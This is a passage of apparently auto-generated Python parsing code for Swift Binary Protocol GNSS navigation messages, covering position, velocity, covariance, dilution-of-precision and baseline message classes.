MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_f64(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_f64(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_f64(buf, offset, length)
ret['z'] = __z
(__accuracy, offset, length) = get_u16(buf, offset, length)
ret['accuracy'] = __accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.accuracy = res['accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_POS_ECEF_COV_GNSS = 0x0234
class MsgPosECEFCovGnss(SBP):
"""SBP class for message MSG_POS_ECEF_COV_GNSS (0x0234).
You can have MSG_POS_ECEF_COV_GNSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The position solution message reports absolute Earth Centered
Earth Fixed (ECEF) coordinates and the status (single point vs
pseudo-absolute RTK) of the position solution. The message also
reports the upper triangular portion of the 3x3 covariance matrix.
If the receiver knows the surveyed position of the base station and has
an RTK solution, this reports a pseudo-absolute position
solution using the base station position and the rover's RTK
baseline vector. The full GPS time is given by the preceding
MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'cov_x_x',
'cov_x_y',
'cov_x_z',
'cov_y_y',
'cov_y_z',
'cov_z_z',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_f64(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_f64(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_f64(buf, offset, length)
ret['z'] = __z
(__cov_x_x, offset, length) = get_f32(buf, offset, length)
ret['cov_x_x'] = judicious_round(np.float32(__cov_x_x)) if SBP.judicious_rounding else __cov_x_x
(__cov_x_y, offset, length) = get_f32(buf, offset, length)
ret['cov_x_y'] = judicious_round(np.float32(__cov_x_y)) if SBP.judicious_rounding else __cov_x_y
(__cov_x_z, offset, length) = get_f32(buf, offset, length)
ret['cov_x_z'] = judicious_round(np.float32(__cov_x_z)) if SBP.judicious_rounding else __cov_x_z
(__cov_y_y, offset, length) = get_f32(buf, offset, length)
ret['cov_y_y'] = judicious_round(np.float32(__cov_y_y)) if SBP.judicious_rounding else __cov_y_y
(__cov_y_z, offset, length) = get_f32(buf, offset, length)
ret['cov_y_z'] = judicious_round(np.float32(__cov_y_z)) if SBP.judicious_rounding else __cov_y_z
(__cov_z_z, offset, length) = get_f32(buf, offset, length)
ret['cov_z_z'] = judicious_round(np.float32(__cov_z_z)) if SBP.judicious_rounding else __cov_z_z
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.cov_x_x = res['cov_x_x']
self.cov_x_y = res['cov_x_y']
self.cov_x_z = res['cov_x_z']
self.cov_y_y = res['cov_y_y']
self.cov_y_z = res['cov_y_z']
self.cov_z_z = res['cov_z_z']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_POS_LLH_GNSS = 0x022A
class MsgPosLLHGnss(SBP):
"""SBP class for message MSG_POS_LLH_GNSS (0x022A).
You can have MSG_POS_LLH_GNSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This position solution message reports the absolute geodetic
coordinates and the status (single point vs pseudo-absolute RTK)
of the position solution. If the rover receiver knows the
surveyed position of the base station and has an RTK solution,
this reports a pseudo-absolute position solution using the base
station position and the rover's RTK baseline vector. The full
GPS time is given by the preceding MSG_GPS_TIME with the
matching time-of-week (tow).
"""
__slots__ = ['tow',
'lat',
'lon',
'height',
'h_accuracy',
'v_accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__lat, offset, length) = get_f64(buf, offset, length)
ret['lat'] = __lat
(__lon, offset, length) = get_f64(buf, offset, length)
ret['lon'] = __lon
(__height, offset, length) = get_f64(buf, offset, length)
ret['height'] = __height
(__h_accuracy, offset, length) = get_u16(buf, offset, length)
ret['h_accuracy'] = __h_accuracy
(__v_accuracy, offset, length) = get_u16(buf, offset, length)
ret['v_accuracy'] = __v_accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.lat = res['lat']
self.lon = res['lon']
self.height = res['height']
self.h_accuracy = res['h_accuracy']
self.v_accuracy = res['v_accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_POS_LLH_COV_GNSS = 0x0231
class MsgPosLLHCovGnss(SBP):
"""SBP class for message MSG_POS_LLH_COV_GNSS (0x0231).
You can have MSG_POS_LLH_COV_GNSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This position solution message reports the absolute geodetic
coordinates and the status (single point vs pseudo-absolute RTK)
of the position solution as well as the upper triangle of the 3x3
covariance matrix. The position information and Fix Mode flags should
follow the MSG_POS_LLH message. Since the covariance matrix is computed
in the local-level North, East, Down frame, the covariance terms follow
with that convention. Thus, covariances are reported against the "downward"
measurement and care should be taken with the sign convention.
"""
__slots__ = ['tow',
'lat',
'lon',
'height',
'cov_n_n',
'cov_n_e',
'cov_n_d',
'cov_e_e',
'cov_e_d',
'cov_d_d',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__lat, offset, length) = get_f64(buf, offset, length)
ret['lat'] = __lat
(__lon, offset, length) = get_f64(buf, offset, length)
ret['lon'] = __lon
(__height, offset, length) = get_f64(buf, offset, length)
ret['height'] = __height
(__cov_n_n, offset, length) = get_f32(buf, offset, length)
ret['cov_n_n'] = judicious_round(np.float32(__cov_n_n)) if SBP.judicious_rounding else __cov_n_n
(__cov_n_e, offset, length) = get_f32(buf, offset, length)
ret['cov_n_e'] = judicious_round(np.float32(__cov_n_e)) if SBP.judicious_rounding else __cov_n_e
(__cov_n_d, offset, length) = get_f32(buf, offset, length)
ret['cov_n_d'] = judicious_round(np.float32(__cov_n_d)) if SBP.judicious_rounding else __cov_n_d
(__cov_e_e, offset, length) = get_f32(buf, offset, length)
ret['cov_e_e'] = judicious_round(np.float32(__cov_e_e)) if SBP.judicious_rounding else __cov_e_e
(__cov_e_d, offset, length) = get_f32(buf, offset, length)
ret['cov_e_d'] = judicious_round(np.float32(__cov_e_d)) if SBP.judicious_rounding else __cov_e_d
(__cov_d_d, offset, length) = get_f32(buf, offset, length)
ret['cov_d_d'] = judicious_round(np.float32(__cov_d_d)) if SBP.judicious_rounding else __cov_d_d
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.lat = res['lat']
self.lon = res['lon']
self.height = res['height']
self.cov_n_n = res['cov_n_n']
self.cov_n_e = res['cov_n_e']
self.cov_n_d = res['cov_n_d']
self.cov_e_e = res['cov_e_e']
self.cov_e_d = res['cov_e_d']
self.cov_d_d = res['cov_d_d']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_ECEF_GNSS = 0x022D
class MsgVelECEFGnss(SBP):
"""SBP class for message MSG_VEL_ECEF_GNSS (0x022D).
You can have MSG_VEL_ECEF_GNSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in Earth Centered Earth Fixed
(ECEF) coordinates. The full GPS time is given by the preceding
MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_s32(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_s32(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_s32(buf, offset, length)
ret['z'] = __z
(__accuracy, offset, length) = get_u16(buf, offset, length)
ret['accuracy'] = __accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.accuracy = res['accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_ECEF_COV_GNSS = 0x0235
class MsgVelECEFCovGnss(SBP):
"""SBP class for message MSG_VEL_ECEF_COV_GNSS (0x0235).
You can have MSG_VEL_ECEF_COV_GNSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in Earth Centered Earth Fixed
(ECEF) coordinates. The full GPS time is given by the preceding
MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'cov_x_x',
'cov_x_y',
'cov_x_z',
'cov_y_y',
'cov_y_z',
'cov_z_z',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_s32(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_s32(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_s32(buf, offset, length)
ret['z'] = __z
(__cov_x_x, offset, length) = get_f32(buf, offset, length)
ret['cov_x_x'] = judicious_round(np.float32(__cov_x_x)) if SBP.judicious_rounding else __cov_x_x
(__cov_x_y, offset, length) = get_f32(buf, offset, length)
ret['cov_x_y'] = judicious_round(np.float32(__cov_x_y)) if SBP.judicious_rounding else __cov_x_y
(__cov_x_z, offset, length) = get_f32(buf, offset, length)
ret['cov_x_z'] = judicious_round(np.float32(__cov_x_z)) if SBP.judicious_rounding else __cov_x_z
(__cov_y_y, offset, length) = get_f32(buf, offset, length)
ret['cov_y_y'] = judicious_round(np.float32(__cov_y_y)) if SBP.judicious_rounding else __cov_y_y
(__cov_y_z, offset, length) = get_f32(buf, offset, length)
ret['cov_y_z'] = judicious_round(np.float32(__cov_y_z)) if SBP.judicious_rounding else __cov_y_z
(__cov_z_z, offset, length) = get_f32(buf, offset, length)
ret['cov_z_z'] = judicious_round(np.float32(__cov_z_z)) if SBP.judicious_rounding else __cov_z_z
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.cov_x_x = res['cov_x_x']
self.cov_x_y = res['cov_x_y']
self.cov_x_z = res['cov_x_z']
self.cov_y_y = res['cov_y_y']
self.cov_y_z = res['cov_y_z']
self.cov_z_z = res['cov_z_z']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_NED_GNSS = 0x022E
class MsgVelNEDGnss(SBP):
"""SBP class for message MSG_VEL_NED_GNSS (0x022E).
You can have MSG_VEL_NED_GNSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in local North East Down (NED)
coordinates. The NED coordinate system is defined as the local WGS84
tangent plane centered at the current position. The full GPS time is
given by the preceding MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'n',
'e',
'd',
'h_accuracy',
'v_accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__n, offset, length) = get_s32(buf, offset, length)
ret['n'] = __n
(__e, offset, length) = get_s32(buf, offset, length)
ret['e'] = __e
(__d, offset, length) = get_s32(buf, offset, length)
ret['d'] = __d
(__h_accuracy, offset, length) = get_u16(buf, offset, length)
ret['h_accuracy'] = __h_accuracy
(__v_accuracy, offset, length) = get_u16(buf, offset, length)
ret['v_accuracy'] = __v_accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.n = res['n']
self.e = res['e']
self.d = res['d']
self.h_accuracy = res['h_accuracy']
self.v_accuracy = res['v_accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_NED_COV_GNSS = 0x0232
class MsgVelNEDCovGnss(SBP):
"""SBP class for message MSG_VEL_NED_COV_GNSS (0x0232).
You can have MSG_VEL_NED_COV_GNSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in local North East Down (NED)
coordinates. The NED coordinate system is defined as the local WGS84
tangent plane centered at the current position. The full GPS time is
given by the preceding MSG_GPS_TIME with the matching time-of-week (tow).
This message is similar to the MSG_VEL_NED, but it includes the upper triangular
portion of the 3x3 covariance matrix.
"""
__slots__ = ['tow',
'n',
'e',
'd',
'cov_n_n',
'cov_n_e',
'cov_n_d',
'cov_e_e',
'cov_e_d',
'cov_d_d',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__n, offset, length) = get_s32(buf, offset, length)
ret['n'] = __n
(__e, offset, length) = get_s32(buf, offset, length)
ret['e'] = __e
(__d, offset, length) = get_s32(buf, offset, length)
ret['d'] = __d
(__cov_n_n, offset, length) = get_f32(buf, offset, length)
ret['cov_n_n'] = judicious_round(np.float32(__cov_n_n)) if SBP.judicious_rounding else __cov_n_n
(__cov_n_e, offset, length) = get_f32(buf, offset, length)
ret['cov_n_e'] = judicious_round(np.float32(__cov_n_e)) if SBP.judicious_rounding else __cov_n_e
(__cov_n_d, offset, length) = get_f32(buf, offset, length)
ret['cov_n_d'] = judicious_round(np.float32(__cov_n_d)) if SBP.judicious_rounding else __cov_n_d
(__cov_e_e, offset, length) = get_f32(buf, offset, length)
ret['cov_e_e'] = judicious_round(np.float32(__cov_e_e)) if SBP.judicious_rounding else __cov_e_e
(__cov_e_d, offset, length) = get_f32(buf, offset, length)
ret['cov_e_d'] = judicious_round(np.float32(__cov_e_d)) if SBP.judicious_rounding else __cov_e_d
(__cov_d_d, offset, length) = get_f32(buf, offset, length)
ret['cov_d_d'] = judicious_round(np.float32(__cov_d_d)) if SBP.judicious_rounding else __cov_d_d
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.n = res['n']
self.e = res['e']
self.d = res['d']
self.cov_n_n = res['cov_n_n']
self.cov_n_e = res['cov_n_e']
self.cov_n_d = res['cov_n_d']
self.cov_e_e = res['cov_e_e']
self.cov_e_d = res['cov_e_d']
self.cov_d_d = res['cov_d_d']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_BODY = 0x0213
class MsgVelBody(SBP):
"""SBP class for message MSG_VEL_BODY (0x0213).
You can have MSG_VEL_BODY inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in the Vehicle Body Frame. By convention,
the x-axis should point out the nose of the vehicle and represent the forward
direction, while as the y-axis should point out the right hand side of the vehicle.
Since this is a right handed system, z should point out the bottom of the vehicle.
The orientation and origin of the Vehicle Body Frame are specified via the device settings.
The full GPS time is given by the preceding MSG_GPS_TIME with the
matching time-of-week (tow). This message is only produced by inertial versions of Swift
products and is not available from Piksi Multi or Duro.
"""
__slots__ = ['tow',
'x',
'y',
'z',
'cov_x_x',
'cov_x_y',
'cov_x_z',
'cov_y_y',
'cov_y_z',
'cov_z_z',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_s32(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_s32(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_s32(buf, offset, length)
ret['z'] = __z
(__cov_x_x, offset, length) = get_f32(buf, offset, length)
ret['cov_x_x'] = judicious_round(np.float32(__cov_x_x)) if SBP.judicious_rounding else __cov_x_x
(__cov_x_y, offset, length) = get_f32(buf, offset, length)
ret['cov_x_y'] = judicious_round(np.float32(__cov_x_y)) if SBP.judicious_rounding else __cov_x_y
(__cov_x_z, offset, length) = get_f32(buf, offset, length)
ret['cov_x_z'] = judicious_round(np.float32(__cov_x_z)) if SBP.judicious_rounding else __cov_x_z
(__cov_y_y, offset, length) = get_f32(buf, offset, length)
ret['cov_y_y'] = judicious_round(np.float32(__cov_y_y)) if SBP.judicious_rounding else __cov_y_y
(__cov_y_z, offset, length) = get_f32(buf, offset, length)
ret['cov_y_z'] = judicious_round(np.float32(__cov_y_z)) if SBP.judicious_rounding else __cov_y_z
(__cov_z_z, offset, length) = get_f32(buf, offset, length)
ret['cov_z_z'] = judicious_round(np.float32(__cov_z_z)) if SBP.judicious_rounding else __cov_z_z
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.cov_x_x = res['cov_x_x']
self.cov_x_y = res['cov_x_y']
self.cov_x_z = res['cov_x_z']
self.cov_y_y = res['cov_y_y']
self.cov_y_z = res['cov_y_z']
self.cov_z_z = res['cov_z_z']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_AGE_CORRECTIONS = 0x0210
class MsgAgeCorrections(SBP):
"""SBP class for message MSG_AGE_CORRECTIONS (0x0210).
You can have MSG_AGE_CORRECTIONS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the Age of the corrections used for the current
Differential solution
"""
__slots__ = ['tow',
'age',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__age, offset, length) = get_u16(buf, offset, length)
ret['age'] = __age
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.age = res['age']
return res, off, length
SBP_MSG_GPS_TIME_DEP_A = 0x0100
class MsgGPSTimeDepA(SBP):
"""SBP class for message MSG_GPS_TIME_DEP_A (0x0100).
You can have MSG_GPS_TIME_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the GPS time, representing the time since
the GPS epoch began on midnight January 6, 1980 UTC. GPS time
counts the weeks and seconds of the week. The weeks begin at the
Saturday/Sunday transition. GPS week 0 began at the beginning of
the GPS time scale.
Within each week number, the GPS time of the week is between
between 0 and 604800 seconds (=60*60*24*7). Note that GPS time
does not accumulate leap seconds, and as of now, has a small
offset from UTC. In a message stream, this message precedes a
set of other navigation messages referenced to the same time
(but lacking the ns field) and indicates a more precise time of
these messages.
"""
__slots__ = ['wn',
'tow',
'ns_residual',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__wn, offset, length) = get_u16(buf, offset, length)
ret['wn'] = __wn
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__ns_residual, offset, length) = get_s32(buf, offset, length)
ret['ns_residual'] = __ns_residual
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.wn = res['wn']
self.tow = res['tow']
self.ns_residual = res['ns_residual']
self.flags = res['flags']
return res, off, length
SBP_MSG_DOPS_DEP_A = 0x0206
class MsgDopsDepA(SBP):
"""SBP class for message MSG_DOPS_DEP_A (0x0206).
You can have MSG_DOPS_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This dilution of precision (DOP) message describes the effect of
navigation satellite geometry on positional measurement
precision.
"""
__slots__ = ['tow',
'gdop',
'pdop',
'tdop',
'hdop',
'vdop',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__gdop, offset, length) = get_u16(buf, offset, length)
ret['gdop'] = __gdop
(__pdop, offset, length) = get_u16(buf, offset, length)
ret['pdop'] = __pdop
(__tdop, offset, length) = get_u16(buf, offset, length)
ret['tdop'] = __tdop
(__hdop, offset, length) = get_u16(buf, offset, length)
ret['hdop'] = __hdop
(__vdop, offset, length) = get_u16(buf, offset, length)
ret['vdop'] = __vdop
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.gdop = res['gdop']
self.pdop = res['pdop']
self.tdop = res['tdop']
self.hdop = res['hdop']
self.vdop = res['vdop']
return res, off, length
SBP_MSG_POS_ECEF_DEP_A = 0x0200
class MsgPosECEFDepA(SBP):
"""SBP class for message MSG_POS_ECEF_DEP_A (0x0200).
You can have MSG_POS_ECEF_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The position solution message reports absolute Earth Centered
Earth Fixed (ECEF) coordinates and the status (single point vs
pseudo-absolute RTK) of the position solution. If the rover
receiver knows the surveyed position of the base station and has
an RTK solution, this reports a pseudo-absolute position
solution using the base station position and the rover's RTK
baseline vector. The full GPS time is given by the preceding
MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_f64(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_f64(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_f64(buf, offset, length)
ret['z'] = __z
(__accuracy, offset, length) = get_u16(buf, offset, length)
ret['accuracy'] = __accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.accuracy = res['accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_POS_LLH_DEP_A = 0x0201
class MsgPosLLHDepA(SBP):
"""SBP class for message MSG_POS_LLH_DEP_A (0x0201).
You can have MSG_POS_LLH_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This position solution message reports the absolute geodetic
coordinates and the status (single point vs pseudo-absolute RTK)
of the position solution. If the rover receiver knows the
surveyed position of the base station and has an RTK solution,
this reports a pseudo-absolute position solution using the base
station position and the rover's RTK baseline vector. The full
GPS time is given by the preceding MSG_GPS_TIME with the
matching time-of-week (tow).
"""
__slots__ = ['tow',
'lat',
'lon',
'height',
'h_accuracy',
'v_accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__lat, offset, length) = get_f64(buf, offset, length)
ret['lat'] = __lat
(__lon, offset, length) = get_f64(buf, offset, length)
ret['lon'] = __lon
(__height, offset, length) = get_f64(buf, offset, length)
ret['height'] = __height
(__h_accuracy, offset, length) = get_u16(buf, offset, length)
ret['h_accuracy'] = __h_accuracy
(__v_accuracy, offset, length) = get_u16(buf, offset, length)
ret['v_accuracy'] = __v_accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.lat = res['lat']
self.lon = res['lon']
self.height = res['height']
self.h_accuracy = res['h_accuracy']
self.v_accuracy = res['v_accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_BASELINE_ECEF_DEP_A = 0x0202
class MsgBaselineECEFDepA(SBP):
"""SBP class for message MSG_BASELINE_ECEF_DEP_A (0x0202).
You can have MSG_BASELINE_ECEF_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the baseline solution in Earth Centered
Earth Fixed (ECEF) coordinates. This baseline is the relative
vector distance from the base station to the rover receiver. The
full GPS time is given by the preceding MSG_GPS_TIME with the
matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_s32(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_s32(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_s32(buf, offset, length)
ret['z'] = __z
(__accuracy, offset, length) = get_u16(buf, offset, length)
ret['accuracy'] = __accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.accuracy = res['accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_BASELINE_NED_DEP_A = 0x0203
class MsgBaselineNEDDepA(SBP):
"""SBP class for message MSG_BASELINE_NED_DEP_A (0x0203).
You can have MSG_BASELINE_NED_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the baseline solution in North East Down
(NED) coordinates. This baseline is the relative vector distance
from the base station to the rover receiver, and NED coordinate
system is defined at the local WGS84 tangent plane centered at the
base station position. The full GPS time is given by the
preceding MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'n',
'e',
'd',
'h_accuracy',
'v_accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__n, offset, length) = get_s32(buf, offset, length)
ret['n'] = __n
(__e, offset, length) = get_s32(buf, offset, length)
ret['e'] = __e
(__d, offset, length) = get_s32(buf, offset, length)
ret['d'] = __d
(__h_accuracy, offset, length) = get_u16(buf, offset, length)
ret['h_accuracy'] = __h_accuracy
(__v_accuracy, offset, length) = get_u16(buf, offset, length)
ret['v_accuracy'] = __v_accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.n = res['n']
self.e = res['e']
self.d = res['d']
self.h_accuracy = res['h_accuracy']
self.v_accuracy = res['v_accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_ECEF_DEP_A = 0x0204
class MsgVelECEFDepA(SBP):
"""SBP class for message MSG_VEL_ECEF_DEP_A (0x0204).
You can have MSG_VEL_ECEF_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in Earth Centered Earth Fixed
(ECEF) coordinates. The full GPS time is given by the preceding
MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'accuracy',
